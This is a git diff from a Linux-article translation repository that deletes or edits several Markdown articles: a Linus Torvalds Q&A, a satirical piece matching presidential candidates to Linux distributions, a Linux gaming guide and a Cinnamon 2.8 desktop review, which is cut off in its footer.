-Now, if somebody is passionate about some "good management" thing, go wild, and try to get involved, and try to manage things. It's not what _I_ am interested in, but hey, the proof is in the pudding - anybody who thinks they have a new rigorous management approach that they think will help some part of the process, go wild.
-
-Now, I personally suspect that it wouldn't work - not only are tech people an ornery lot to begin with (that whole "herding cats" thing), just look at all the crazy arguments on the internet. And ask yourself what actually holds an open source project like the kernel together? I think you need to be very oriented towards the purely technical solutions, simply because then you have tangible and real issues you can discuss (and argue about) with fairly clear-cut hard answers. It's the only thing people can really agree on in the big picture.
-
-So the Linux approach to "management" has been to put technology first. That's rigorous enough for me. But as mentioned, it's a free-for-all. Anybody can come in and try to do better. Really.
-
-And btw, it's worth noting that there are obviously specific smaller development teams where other management models work fine. Most of the individual developers are parts of teams inside particular companies, and within the confines of that company, there may well be a very strict rigorous management model. Similarly, within the confines of a particular productization effort there may be particular goals and models for that particular team that transcend that general "technical issues" thing.
-
-Just to give a concrete example, the "development kernel" tree that I maintain works fundamentally differently and with very different rules from the "stable tree" that Greg does, which in turn is maintained very differently from what a distribution team within a Linux company does inside its maintenance kernel team.
-
-So there's certainly room for different approaches to managing those very different groups. But do I think you can "rigorously manage" people on the internet? No.
-
-**Functional languages?**
-by EmeraldBot
-
-> While historically you've been a C and Assembly guy (and the odd shell scripting and such), what do you think of functional languages such as Lisp, Closure, Haskell, etc? Do you see any advantages to them, or do you view them as frivolous and impractical? If you decide to do so, thanks for taking the time to answer my question! You're a legend at what you do, and I think it's awesome that the significantly less interesting me can ask you a question like this.
-
-**Linus**: I may be a fan of C (with a certain fondness for assembly, just because it's so close to the machine), but that's very much about a certain context. I work at a level where those languages make sense. I certainly don't think that tools like Haskell etc are "frivolous and impractical" in general, although on a kernel level (or in a source control management system) I suspect they kind of are.
-
-Many moons ago I worked on sparse (the C parser and analyzer), and one of my coworkers was a Haskell fan, and did incredible example transformations in very simple (well, to him) code - stuff that is just nasty to write in C because it's pretty high-level, there's tons of memory management, and you're really talking about implementing fairly abstract and high-level rules with pattern matching etc.
-
-So I'm definitely not a functional language kind of guy - it's not how I learnt programming, and it really isn't very relevant to what I do, and I wouldn't recognize Haskell code if it bit me in the ass and called me names. But no, I wouldn't call them frivolous.
-
-**Critical software to the use of Linux**
-by TWX
-
-> Mr. Torvalds, For many uses of Linux such as on the desktop, other software beyond the kernel and the base GNU tools are required. What other projects would you like to see given priority, and what would you like to see implemented or improved? Admittedly I thought most about X-Windows when asking this question; but I don't doubt that other daemons or systems can be just as important to the user experience. Thank you for your efforts all these years.
-
-**Linus**: Hey, I don't really have any particular project I would want to champion, largely because we all have so different requirements on the desktop. There's just no single thing that stands out as being hugely more important than others to me.
-
-What I do wish particularly desktop developers cared about is "consistency of experience". And by that I don't mean some kind of enforced visual consistency between different applications to make things "look coherent". No, I'm just talking about the pain and uncertainty users go through with upgrades, and understanding that while your project may be the most important project to *you* (because it's what you do), to your users, your project is likely just a fairly small and irrelevant part of their experience, and it's not very central at all, and they've learnt the quirks about that thing they don't even care about, and you really shouldn't break their expectations. Because it turns out that that is how you really make people hate their desktop.
-
-This is not at all Linux-specific, of course - just look at the less than enthusiastic reception that other operating system redesigns have received. But I really wish that we hadn't had *both* of the major Linux desktop environments have to learn this (well, I hope they learnt) the hard way, and both of them ending up blaming their users rather than themselves.
-
-**"anykernel"-style portable drivers?**
-by staalmannen
-
-> What do you think about the "anykernel" concept (invented by another Finn btw) used in NetBSD? Basically, they have modularized the code so that a driver can be built either in a monolithic kernel or for user space without source code changes ( rumpkernel.org ). The drivers are highly portable and used in Genode os (L4 type kernels), minix etc... Would this be possible or desirable for Linux? Apparently there is one attempt called "libos"...
-
-**Linus**: So I have bad experiences with "portable" drivers. Writing drivers to some common environment tends to force some ridiculously nasty impedance matching abstractions that just get in the way and make things really hard to read and modify. It gets particularly nasty when everybody ends up having complicated - and differently so - driver subsystems to handle a lot of commonalities for a certain class of drivers (say a network driver, or a USB driver), and the different operating systems really have very different approaches and locking rules etc.
-
-I haven't seen anykernel drivers, but from past experience my reaction to "portable device drivers" is to run away, screaming like little girl. As they say in Swedish "Bränt barn luktar illa".
-
-**Processor Architecture**
-by swv3752
-
-> Several years ago, you were employed by Transmeta designing the Crusoe processor. I understand you are quite knowledgeable about cpu architecture. What are your thoughts on the Current Intel and AMD x86 CPUs particularly in comparison with ARM and IBM's Power8 CPUs? Where do you see the advantages of each one?
-
-**Linus**: I'm no CPU architect, I just play one on TV.
-
-But yes, I've been close to the CPU both as part of my kernel work, and as part of a processor company, and working at that level for a long time just means that you end up having fairly strong opinions. One of the things that my experiences at Transmeta convinced me of, for example, was that there's definitely very much a limit to what software should care about. I loved working at Transmeta, I loved the whole startup company environment, I loved working with really smart people, but in the end I ended up absolutely *not* loving to work with overly simple hardware (I also didn't love the whole IPO process, and what that did to the company culture, but that's a different thing).
-
-Because there's only so much that software can do to compensate.
-
-Something similar happened with my kernel work on the alpha architecture, which also started out as being an overly simplified implementation in the name of being small and supposedly running really fast. While I really started out liking the alpha architecture for being so clean, I ended up detesting how fragile the architecture implementations were (and by the time that got fixed in the 21264, I had given up on alpha).
-
-So I've come to absolutely detest CPU's that need a lot of compiler smarts or special tuning to go fast. Life is too short to waste on in-order CPU's, or on hardware designers who think software should take care of the pieces that they find to be too complicated to handle themselves, and as a result just left undone. "Weak memory ordering" is just another example.
-
-Thankfully, most of the industry these days seems to agree. Yes, there are still in-order cores, but nobody tries to make excuses for them any more: they are for the truly cheap and low-end market.
-
-I tend to really like the modern Intel cores in particular, which tend to take that "let's not be stupid" really to heart. With the kernel being so threaded, I end up caring a lot about things like memory ordering etc, and the Intel big-core CPU's tend to be in a class of their own there. As a software person who cares about performance and looks at instruction profiles etc, it's just so *nice* to see that the CPU doesn't have some crazy glass jaw where you have to be very careful.
-
-**GPU kernels**
-by maraist
-
-> Is there any inspiration that a GPU based kernel / scheduler has for you? How might Linux be improved to better take advantage of GPU-type batch execution models. Given that you worked transmeta and JIT compiled host-targeted runtimes. GPUs 1,000-thread schedulers seem like the next great paradigm for the exact type of machines that Linux does best on.
-
-**Linus**: I don't think we'll see the kernel ever treat GPU threads the way we treat CPU threads. Not with the current model of GPU's (and that model doesn't really seem to be changing all that much any more).
-
-Yes, GPU's are getting much better, and now generally have virtual memory and the ability to preempt execution, and you could run an OS on them. But the scheduling latencies are pretty high, and the threads are not really "independent" (ie they tend to share a lot of state - like the virtual address space and a large shared register set), so GPU "threads" don't tend to work like CPU threads. You'd schedule them all-or-nothing, so if you were to switch processes, you'd treat the GPU as one entity where you switch all the threads at once.
-
-So it really wouldn't look like a thousand threads to the kernel. The GPU would still be scheduled as one single entity (or maybe a couple of entities depending on how the GPU is partitioned). The fact that that single entity works by doing a lot of things in massive parallelism is kind of immaterial for the kernel that doesn't end up seeing that parallelism as separate threads.
-
-**alleged danger of Artificial Intelligence**
-by peter303
-
-> Some computer experts like Marvin Minsky, Larry Page, Ray Kuzweil think A.I. will be a great gift to Mankind. Others like Bill Joy and Elon Musk are fearful of potential danger. Where do you stand, Linus?
-
-**Linus**: I just don't see the thing to be fearful of.
-
-We'll get AI, and it will almost certainly be through something very much like recurrent neural networks. And the thing is, since that kind of AI will need training, it won't be "reliable" in the traditional computer sense. It's not the old rule-based prolog days, when people thought they'd *understand* what the actual decisions were in an AI.
-
-And that all makes it very interesting, of course, but it also makes it hard to productize. Which will very much limit where you'll actually find those neural networks, and what kinds of network sizes and inputs and outputs they'll have.
-
-So I'd expect just more of (and much fancier) rather targeted AI, rather than anything human-like at all. Language recognition, pattern recognition, things like that. I just don't see the situation where you suddenly have some existential crisis because your dishwasher is starting to discuss Sartre with you.
-
-The whole "Singularity" kind of event? Yeah, it's science fiction, and not very good SciFi at that, in my opinion. Unending exponential growth? What drugs are those people on? I mean, really..
-
-It's like Moore's law - yeah, it's very impressive when something can (almost) be plotted on an exponential curve for a long time. Very impressive indeed when it's over many decades. But it's _still_ just the beginning of the "S curve". Anybody who thinks any different is just deluding themselves. There are no unending exponentials.
-
-**Is the kernel basically a finished project?**
-by NaCh0
-
-> Aside from adding drivers and refactoring algorithms when performance limits are discovered, is there anything left for the kernel? Maybe it's a failure of tech journalism but we never hear about the next big thing in kernel land anymore.
-
-**Linus**: I don't think there's much of a "next big thing" in the kernel.
-
-I wouldn't say that there is nothing but drivers (and architectures are kind of "CPU drivers) and improving scalability left, because I'm constantly amazed by how many new things people figure out are still good ideas. But they tend to still be pretty incremental improvements. An OS kernel doesn't look *that* radically different from what it was 40 years ago, and that's fine. I think radical new ideas are often overrated, and the thing that really matters in the end is that plodding detail work. That's how technology evolves.
-
-And judging by how our kernel releases are going, there's no end in sight for that "plodding detail work". And it's still as interesting as it ever was.
-
---------------------------------------------------------------------------------
-
-via: http://linux.slashdot.org/story/15/06/30/0058243/interviews-linus-torvalds-answers-your-question
-
-作者:[samzenpus][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:samzenpus@slashdot.org
-[1]:http://interviews.slashdot.org/story/15/06/24/1718247/interview-ask-linus-torvalds-a-question
-[2]:http://meta.slashdot.org/story/12/10/11/0030249/linus-torvalds-answers-your-questions
-[3]:https://lwn.net/Articles/604695/
diff --git a/sources/talk/20150806 Torvalds 2.0--Patricia Torvalds on computing college feminism and increasing diversity in tech.md b/sources/talk/20150806 Torvalds 2.0--Patricia Torvalds on computing college feminism and increasing diversity in tech.md
index 36f5642c10..10a30119e1 100644
--- a/sources/talk/20150806 Torvalds 2.0--Patricia Torvalds on computing college feminism and increasing diversity in tech.md
+++ b/sources/talk/20150806 Torvalds 2.0--Patricia Torvalds on computing college feminism and increasing diversity in tech.md
@@ -78,4 +78,4 @@ via: http://opensource.com/life/15/8/patricia-torvalds-interview
[4]:https://www.facebook.com/guerrillafeminism
[5]:https://modelviewculture.com/
[6]:https://www.aspirations.org/
-[7]:https://www.facebook.com/groups/LadiesStormHackathons/
\ No newline at end of file
+[7]:https://www.facebook.com/groups/LadiesStormHackathons/
diff --git a/sources/talk/20150820 Which Open Source Linux Distributions Would Presidential Hopefuls Run.md b/sources/talk/20150820 Which Open Source Linux Distributions Would Presidential Hopefuls Run.md
deleted file mode 100644
index 2a850a7468..0000000000
--- a/sources/talk/20150820 Which Open Source Linux Distributions Would Presidential Hopefuls Run.md
+++ /dev/null
@@ -1,53 +0,0 @@
-Which Open Source Linux Distributions Would Presidential Hopefuls Run?
-================================================================================
-![Republican presidential candidate Donald Trump
-](http://thevarguy.com/site-files/thevarguy.com/files/imagecache/medium_img/uploads/2015/08/donaldtrump.jpg)
-
-Republican presidential candidate Donald Trump
-
-If people running for president used Linux or another open source operating system, which distribution would it be? That's a key question that the rest of the press—distracted by issues of questionable relevance such as "policy platforms" and whether it's appropriate to add an exclamation point to one's Christian name—has been ignoring. But the ignorance ends here: Read on for this sometime-journalist's take on presidential elections and Linux distributions.
-
-If this sounds like a familiar topic to those of you who have been reading my drivel for years (is anyone, other than my dear editor, unfortunate enough to have actually done that?), it's because I wrote a [similar post][1] during the last presidential election cycle. Some kind readers took that article more seriously than I intended, so I'll take a moment to point out that I don't actually believe that open source software and political campaigns have anything meaningful to do with one another. I am just trying to amuse myself at the start of a new week.
-
-But you can make of this what you will. You're the reader, after all.
-
-### Linux Distributions of Choice: Republicans ###
-
-Today, I'll cover just the Republicans. And I won't even discuss all of them, since the candidates hoping for the Republican party's nomination are too numerous to cover fully here in one post. But for starters:
-
-If **Jeb (Jeb!?) Bush** ran Linux, it would be [Debian][2]. It's a relatively boring distribution designed for serious, grown-up hackers—the kind who see it as their mission to be the adults in the pack and clean up the messes that less-experienced open source fans create. Of course, this also makes Debian relatively unexciting, and its user base remains perennially small as a result.
-
-**Scott Walker**, for his part, would be a [Damn Small Linux][3] (DSL) user. Requiring merely 50MB of disk space and 16MB of RAM to run, DSL can breathe new life into 20-year-old 486 computers—which is exactly what a cost-cutting guru like Walker would want. Of course, the user experience you get from DSL is damn primitive; the platform barely runs a browser. But at least you won't be wasting money on new computer hardware when the stuff you bought in 1993 can still serve you perfectly well.
-
-How about **Chris Christie**? He'd obviously be clinging to [Relax-and-Recover Linux][4], which bills itself as a "setup-and-forget Linux bare metal disaster recovery solution." "Setup-and-forget" has basically been Christie's political strategy ever since that unfortunate incident on the George Washington Bridge stymied his political momentum. Disaster recovery may or may not bring back everything for Christie in the end, but at least he might succeed in recovering a confidential email or two that accidentally disappeared when his computer crashed.
-
-As for **Carly Fiorina**, she'd no doubt be using software developed for "[The Machine][5]" operating system from [Hewlett-Packard][6] (HPQ), the company she led from 1999 to 2005. The Machine actually may run several different operating systems, which may or may not be based on Linux—details remain unclear—and its development began well after Fiorina's tenure at HP came to a conclusion. Still, her roots as a successful executive in the IT world form an important part of her profile today, meaning that her ties to HP have hardly been severed fully.
-
-Last but not least—and you knew this was coming—there's **Donald Trump**. He'd most likely pay a team of elite hackers millions of dollars to custom-build an operating system just for him—even though he could obtain a perfectly good, ready-made operating system for free—to show off how much money he has to waste. He'd then brag about it being the best operating system ever made, though it would of course not be compliant with POSIX or anything else, because that would mean catering to the establishment. The platform would also be totally undocumented, since, if Trump explained how his operating system actually worked, he'd risk giving away all his secrets to the Islamic State—obviously.
-
-Alternatively, if Trump had to go with a Linux platform already out there, [Ubuntu][7] seems like the most obvious choice. Like Trump, the Ubuntu developers have taken a we-do-what-we-want approach to building open source software by implementing their own, sometimes proprietary applications and interfaces. Free-software purists hate Ubuntu for that, but plenty of ordinary people like it a lot. Of course, whether playing purely by your own rules—in the realms of either software or politics—is sustainable in the long run remains to be seen.
-
-### Stay Tuned ###
-
-If you're wondering why I haven't yet mentioned the Democratic candidates, worry not. I am not leaving them out of today's writing because I like them any more or less than the Republicans. (Personally, I think the peculiar American practice of having only two viable political parties—which virtually no other functioning democracy does—is ridiculous, and I am suspicious of all of these candidates as a result.)
-
-On the contrary, there's plenty to say about the Linux distributions the Democrats might use, too. And I will, in a future post. Stay tuned.
-
---------------------------------------------------------------------------------
-
-via: http://thevarguy.com/open-source-application-software-companies/081715/which-open-source-linux-distributions-would-presidential-
-
-作者:[Christopher Tozzi][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://thevarguy.com/author/christopher-tozzi
-[1]:http://thevarguy.com/open-source-application-software-companies/aligning-linux-distributions-presidential-hopefuls
-[2]:http://debian.org/
-[3]:http://www.damnsmalllinux.org/
-[4]:http://relax-and-recover.org/
-[5]:http://thevarguy.com/open-source-application-software-companies/061614/hps-machine-open-source-os-truly-revolutionary
-[6]:http://hp.com/
-[7]:http://ubuntu.com/
\ No newline at end of file
diff --git a/sources/talk/20151019 Gaming On Linux--All You Need To Know.md b/sources/talk/20151019 Gaming On Linux--All You Need To Know.md
deleted file mode 100644
index 525d08838b..0000000000
--- a/sources/talk/20151019 Gaming On Linux--All You Need To Know.md
+++ /dev/null
@@ -1,205 +0,0 @@
-213edu Translating
-
-Gaming On Linux: All You Need To Know
-================================================================================
-![](http://itsfoss.itsfoss.netdna-cdn.com/wp-content/uploads/2015/10/Gaming-on-Linux.jpeg)
-
-**Can I play games on Linux?**
-
-This is one of the most frequently asked questions by people who are thinking about [switching to Linux][1]. After all, gaming on Linux often termed as a distant possibility. In fact, some people even wonder if they can listen to music or watch movies on Linux. Considering that, question about native Linux games seem genuine.
-
-In this article, I am going to answer most of the Linux gaming questions a Linux beginner may have. For example, if it is possible to play games on Linux, if yes, what are the Linux games available, where can you **download Linux games** from or how do you get more information of gaming on Linux.
-
-But before I do that, let me make a confession. I am not a PC gamer or rather I should say, I am not desktop Linux gamer. I prefer to play games on my PS4 and I don’t care about PC games or even mobile games (no candy crush request sent to anyone in my friend list). This is the reason you see only a few articles in [Linux games][2] section of It’s FOSS.
-
-So why am I covering this topic then?
-
-Because I have been asked questions about playing games on Linux several times and I wanted to come up with a Linux gaming guide that could answer all those question. And remember, it’s not just gaming on Ubuntu I am talking about here. I am talking about Linux in general.
-
-### Can you play games on Linux? ###
-
-Yes and no!
-
-Yes, you can play games on Linux and no, you cannot play ‘all the games’ in Linux.
-
-Confused? Don’t be. What I meant here is that you can get plenty of popular games on Linux such as [Counter Strike, Metro Last Night][3] etc. But you might not get all the latest and popular Windows games on Linux, for e.g., [PES 2015][4].
-
-The reason, in my opinion, is that Linux has less than 2% of desktop market share and these numbers are demotivating enough for most game developers to avoid working on the Linux version of their games.
-
-Which means that there is huge possibility that the most talked about games of the year may not be playable in Linux. Don’t despair, there are ‘other means’ to get these games on Linux and we shall see it in coming sections, but before that let’s talk about what kind of games are available for Linux.
-
-If I have to categorize, I’ll divide them in four categories:
-
-1. Native Linux Games
-1. Windows games in Linux
-1. Browser Games
-1. Terminal Games
-
-Let’s start with the most important one, native Linux games, first.
-
-----------
-
-### 1. Where to find native Linux games? ###
-
-Native Linux games mean those games which are officially supported in Linux. These games have native Linux client and can be installed like most other applications in Linux without requiring any additional effort (we’ll see about these in next section).
-
-So, as you see, there are games developed for Linux. Next question that arises is where can you find these Linux games and how can you play them. I am going to list some of the resources where you can get Linux games.
-
-#### Steam ####
-
-![](http://itsfoss.itsfoss.netdna-cdn.com/wp-content/uploads/2015/09/Install-Steam-Ubuntu-11.jpeg)
-
-“[Steam][5] is a digital distribution platform for video games. As Amazon Kindle is digital distribution platform for e-Books, iTunes for music, similarly Steam is for games. It provides you the option to buy and install games, play multiplayer and stay in touch with other games via social networking on its platform. The games are protected with [DRM][6].”
-
-A couple of years ago, when gaming platform Steam announced support for Linux, it was a big news. It was an indication that gaming on Linux is being taken seriously. Though Steam’s decision was more influenced with its own Linux-based gaming console and a separate [Linux distribution called Steam OS][7], it still was a reassuring move that has brought a number of games on Linux.
-
-I have written a detailed article about installing and using Steam. If you are getting started with Steam, do read it.
-
-- [Install and use Steam for gaming on Linux][8]
-
-#### GOG.com ####
-
-[GOG.com][9] is another platform similar to Steam. Like Steam, you can browse and find hundreds of native Linux games on GOG.com, purchase the games and install them. If the games support several platforms, you can download and use them across various operating systems. Your purchased games are available for you all the time in your account. You can download them anytime you wish.
-
-One main difference between the two is that GOG.com offers only DRM free games and movies. Also, GOG.com is entirely web based. So you don’t need to install a client like Steam. You can simply download the games from browser and install them in your system.
-
-#### Portable Linux Games ####
-
-[Portable Linux Games][10] is a website that has a collection of a number of Linux games. The unique and best thing about Portable Linux Games is that you can download and store the games for offline installation.
-
-The downloaded files have all the dependencies (at times Wine and Perl installation) and these are also platform independent. All you need to do is to download the files and double click to install them. Store the downloadable file on external hard disk and use them in future. Highly recommend if you don’t have continuous access to high speed internet.
-
-#### Game Drift Game Store ####
-
-[Game Drift][11] is actually a Linux distribution based on Ubuntu with sole focus on gaming. While you might not want to start using this Linux distribution for the sole purpose of gaming, you can always visit its game store online and see what games are available for Linux and install them.
-
-#### Linux Game Database ####
-
-As the name suggests, [Linux Game Database][12] is a website with a huge collection of Linux games. You can browse through various category of games and download/install them from the game developer’s website. As a member of Linux Game Database, you can even rate the games. LGDB, kind of, aims to be the IGN or IMDB for Linux games.
-
-#### Penguspy ####
-
-Created by a gamer who refused to use Windows for playing games, [Penguspy][13] showcases a collection of some of the best Linux games. You can browse games based on category and if you like the game, you’ll have to go to the respective game developer’s website.
-
-#### Software Repositories ####
-
-Look into the software repositories of your own Linux distribution. There always will be some games in it. If you are using Ubuntu, Ubuntu Software Center itself has an entire section for games. Same is true for other Linux distributions such as Linux Mint etc.
-
-----------
-
-### 2. How to play Windows games in Linux? ###
-
-![](http://itsfoss.itsfoss.netdna-cdn.com/wp-content/uploads/2015/10/Wine-Linux.png)
-
-So far we talked about native Linux games. But there are not many Linux games, or to be more precise, most popular Linux games are not available for Linux but they are available for Windows PC. So the questions arises, how to play Windows games in Linux?
-
-Good thing is that with the help of tools like Wine, PlayOnLinux and CrossOver, you can play a number of popular Windows games in Linux.
-
-#### Wine ####
-
-Wine is a compatibility layer which is capable of running Windows applications in systems like Linux, BSD and OS X. With the help of Wine, you can install and use a number of Windows applications in Linux.
-
-[Installing Wine in Ubuntu][14] or any other Linux is easy as it is available in most Linux distributions’ repository. There is a huge [database of applications and games supported by Wine][15] that you can browse.
-
-#### CrossOver ####
-
-[CrossOver][16] is an improved version of Wine that brings professional and technical support to Wine. But unlike Wine, CrossOver is not free. You’ll have to purchase the yearly license for it. Good thing about CrossOver is that every purchase contributes to Wine developers and that in fact boosts the development of Wine to support more Windows games and applications. If you can afford $48 a year, you should buy CrossOver for the support they provide.
-
-### PlayOnLinux ###
-
-PlayOnLinux too is based on Wine but implemented differently. It has different interface and slightly easier to use than Wine. Like Wine, PlayOnLinux too is free to use. You can browse the [applications and games supported by PlayOnLinux on its database][17].
-
-----------
-
-### 3. Browser Games ###
-
-![](http://itsfoss.itsfoss.netdna-cdn.com/wp-content/uploads/2015/10/Chrome-Web-Store.jpeg)
-
-Needless to say that there are tons of browser based games that are available to play in any operating system, be it Windows or Linux or Mac OS X. Most of the addictive mobile games, such as [GoodGame Empire][18], also have their web browser counterparts.
-
-Apart from that, thanks to [Google Chrome Web Store][19], you can play some more games in Linux. These Chrome games are installed like a standalone app and they can be accessed from the application menu of your Linux OS. Some of these Chrome games are playable offline as well.
-
-----------
-
-### 4. Terminal Games ###
-
-![](http://itsfoss.itsfoss.netdna-cdn.com/wp-content/uploads/2014/03/nSnake_Linux_terminal_game.jpeg)
-
-Added advantage of using Linux is that you can use the command line terminal to play games. I know that it’s not the best way to play games but at times, it’s fun to play games like [Snake][20] or [2048][21] in terminal. There is a good collection of Linux terminal games at [this blog][22]. You can browse through it and play the ones you want.
-
-----------
-
-### How to stay updated about Linux games? ###
-
-When you have learned a lot about what kind of games are available on Linux and how could you use them, next question is how to stay updated about new games on Linux? And for that, I advise you to follow these blogs that provide you with the latest happenings of the Linux gaming world:
-
-- [Gaming on Linux][23]: I won’t be wrong if I call it the nest Linux gaming news portal. You get all the latest rumblings and news about Linux games. Frequently updated, Gaming on Linux has dedicated fan following which makes it a nice community of Linux game lovers.
-- [Free Gamer][24]: A blog focusing on free and open source games.
-- [Linux Game News][25]: A Tumbler blog that updates on various Linux games.
-
-#### What else? ####
-
-I think that’s pretty much what you need to know to get started with gaming on Linux. If you are still not convinced, I would advise you to [dual boot Linux with Windows][26]. Use Linux as your main desktop and if you want to play games, boot into Windows. This could be a compromised solution.
-
-I think that’s pretty much what you need to know to get started with gaming on Linux. If you are still not convinced, I would advise you to [dual boot Linux with Windows][27]. Use Linux as your main desktop and if you want to play games, boot into Windows. This could be a compromised solution.
-
-It’s time for you to add your inputs. Do you play games on your Linux desktop? What are your favorites? What blogs you follow to stay updated on latest Linux games?
-
-
-投票项目:
-How do you play games on Linux?
-
-- I use Wine and PlayOnLinux along with native Linux Games
-- I am happy with Browser Games
-- I prefer the Terminal Games
-- I use native Linux games only
-- I play it on Steam
-- I dual boot and go in to Windows to play games
-- I don't play games at all
-
-注:投票代码
-
-
-
-
-
-注,发布时根据情况看怎么处理
-
---------------------------------------------------------------------------------
-
-via: http://itsfoss.com/linux-gaming-guide/
-
-作者:[Abhishek][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://itsfoss.com/author/abhishek/
-[1]:http://itsfoss.com/reasons-switch-linux-windows-xp/
-[2]:http://itsfoss.com/category/games/
-[3]:http://blog.counter-strike.net/
-[4]:https://pes.konami.com/tag/pes-2015/
-[5]:http://store.steampowered.com/
-[6]:https://en.wikipedia.org/wiki/Digital_rights_management
-[7]:http://itsfoss.com/valve-annouces-linux-based-gaming-operating-system-steamos/
-[8]:http://itsfoss.com/install-steam-ubuntu-linux/
-[9]:http://www.gog.com/
-[10]:http://www.portablelinuxgames.org/
-[11]:http://gamedrift.org/GameStore.html
-[12]:http://www.lgdb.org/
-[13]:http://www.penguspy.com/
-[14]:http://itsfoss.com/wine-1-5-11-released-ppa-available-to-download/
-[15]:https://appdb.winehq.org/
-[16]:https://www.codeweavers.com/products/
-[17]:https://www.playonlinux.com/en/supported_apps.html
-[18]:http://empire.goodgamestudios.com/
-[19]:https://chrome.google.com/webstore/category/apps
-[20]:http://itsfoss.com/nsnake-play-classic-snake-game-linux-terminal/
-[21]:http://itsfoss.com/play-2048-linux-terminal/
-[22]:https://ttygames.wordpress.com/
-[23]:https://www.gamingonlinux.com/
-[24]:http://freegamer.blogspot.fr/
-[25]:http://linuxgamenews.com/
-[26]:http://itsfoss.com/install-ubuntu-1404-dual-boot-mode-windows-8-81-uefi/
-[27]:http://itsfoss.com/install-ubuntu-1404-dual-boot-mode-windows-8-81-uefi/
diff --git a/sources/talk/20151117 How bad a boss is Linus Torvalds.md b/sources/talk/20151117 How bad a boss is Linus Torvalds.md
index 8b10e44584..7ebba90483 100644
--- a/sources/talk/20151117 How bad a boss is Linus Torvalds.md
+++ b/sources/talk/20151117 How bad a boss is Linus Torvalds.md
@@ -1,3 +1,4 @@
+sonofelice translating
How bad a boss is Linus Torvalds?
================================================================================
![linus torvalds](http://images.techhive.com/images/article/2015/08/linus_torvalds-100600260-primary.idge.jpg)
@@ -74,4 +75,4 @@ via: http://www.computerworld.com/article/3004387/it-management/how-bad-a-boss-i
[1]:http://www.computerworld.com/article/2874475/linus-torvalds-diversity-gaffe-brings-out-the-best-and-worst-of-the-open-source-world.html
[2]:http://www.zdnet.com/article/linux-4-3-released-after-linus-torvalds-scraps-brain-damage-code/
[3]:http://lkml.iu.edu/hypermail/linux/kernel/1510.3/02866.html
-[4]:http://sarah.thesharps.us/2015/10/05/closing-a-door/
\ No newline at end of file
+[4]:http://sarah.thesharps.us/2015/10/05/closing-a-door/
diff --git a/sources/talk/20151201 Cinnamon 2.8 Review.md b/sources/talk/20151201 Cinnamon 2.8 Review.md
deleted file mode 100644
index 0529cf80ec..0000000000
--- a/sources/talk/20151201 Cinnamon 2.8 Review.md
+++ /dev/null
@@ -1,89 +0,0 @@
-translating by wwy-hust
-
-Cinnamon 2.8 Review
-================================================================================
-![](https://www.maketecheasier.com/assets/uploads/2015/11/cinnamon-2-8-featured.jpg)
-
-Other than Gnome and KDE, Cinnamon is another desktop environment that is used by many people. It is made by the same team that produces Linux Mint (and ships with Linux Mint) and can also be installed on several other distributions. The latest version of this DE – Cinnamon 2.8 – was released earlier this month, and it brings a host of bug fixes and improvements as well as some new features.
-
-I’m going to go over the major improvements made in this release as well as how to update to Cinnamon 2.8 or install it for the first time.
-
-### Improvements to Applets ###
-
-There are several improvements to already existing applets for the panel.
-
-#### Sound Applet ####
-
-![cinnamon-28-sound-applet](https://www.maketecheasier.com/assets/uploads/2015/11/rsz_cinnamon-28-sound-applet.jpg)
-
-The Sound applet was revamped and now displays track information as well as the media controls on top of the cover art of the audio file. For music players with seeking support (such as Banshee), a progress bar will be displayed in the same region which you can use to change the position of the audio track. Right-clicking on the applet in the panel will display the options to mute input and output devices.
-
-#### Power Applet ####
-
-The Power applet now displays the status of each of the connected batteries and devices using the manufacturer’s data instead of generic names.
-
-#### Window Thumbnails ####
-
-![cinnamon-2.8-window-thumbnails](https://www.maketecheasier.com/assets/uploads/2015/11/cinnamon-2.8-window-thumbnails.png)
-
-Cinnamon 2.8 brings the option to show window thumbnails when hovering over the window list in the panel. You can turn it off if you don’t like it, though.
-
-#### Workspace Switcher Applet ####
-
-![cinnamon-2.8-workspace-switcher](https://www.maketecheasier.com/assets/uploads/2015/11/cinnamon-2.8-workspace-switcher.png)
-
-Adding the Workspace switcher applet to your panel will show you a visual representation of your workspaces with little rectangles embedded inside to show the position of your windows.
-
-#### System Tray ####
-
-Cinnamon 2.8 brings support for app indicators in the system tray. You can easily disable this in the settings which will force affected apps to fall back to using status icons instead.
-
-### Visual Improvements ###
-
-A host of visual improvements were made in Cinnamon 2.8. The classic and preview Alt + Tab switchers were polished with noticeable improvements, while the Alt + F2 dialog received bug fixes and better auto completion for commands.
-
-Also, the issue with the traditional animation effect for minimizing windows is now sorted and works with multiple panels.
-
-### Nemo Improvements ###
-
-![cinnamon-2.8-nemo](https://www.maketecheasier.com/assets/uploads/2015/11/rsz_cinnamon-28-nemo.jpg)
-
-The default file manager for Cinnamon also received several bug fixes and has a new “Quick-rename” feature for renaming files and directories. This works by clicking the file or directory twice with a short pause in between to rename the files.
-
-Nemo also detects issues with thumbnails automatically and prompts you to quickly fix them.
-
-### Other Notable improvements ###
-
-- Applets now reload themselves automatically once they are updated.
-- Support for multiple monitors was improved significantly.
-- Dialog windows have been improved and now attach themselves to their parent windows.
-- HiDPI dectection has been improved.
-- QT5 applications now look more native and use the default GTK theme.
-- Window management and rendering performance has been improved.
-- There are various bugfixes.
-
-### How to Get Cinnamon 2.8 ###
-
-If you’re running Linux Mint you will get Cinnamon 2.8 as part of the upgrade to Linux Mint 17.3 “Rosa” Cinnamon Edition. The BETA release is already out, so you can grab that if you’d like to get your hands on the new software immediately.
-
-For Arch users, Cinnamon 2.8 is already in the official Arch repositories, so you can just update your packages and do a system-wide upgrade to get the latest version.
-
-Finally, for Ubuntu users, you can install or upgrade to Cinnamon 2.8 by running in turn the following commands:
-
- sudo add-apt-repository -y ppa:moorkai/cinnamon
- sudo apt-get update
- sudo apt-get install cinnamon
-
-Have you tried Cinnamon 2.8? What do you think of it?
-
---------------------------------------------------------------------------------
-
-via: https://www.maketecheasier.com/cinnamon-2-8-review/
-
-作者:[Ayo Isaiah][a]
